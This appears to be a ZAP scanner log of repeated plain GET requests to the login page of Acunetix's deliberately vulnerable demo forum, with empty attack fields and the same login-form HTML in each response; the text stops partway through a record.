<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=35 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:04 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=36 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:04 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=37 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:05 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=38 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:05 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=39 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:05 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 371 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=4 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:00 GMT Content-Length: 3133 |
Response Body - size: 3,133 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=40 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:05 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D41 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D41 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=41 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:05 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D41" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p 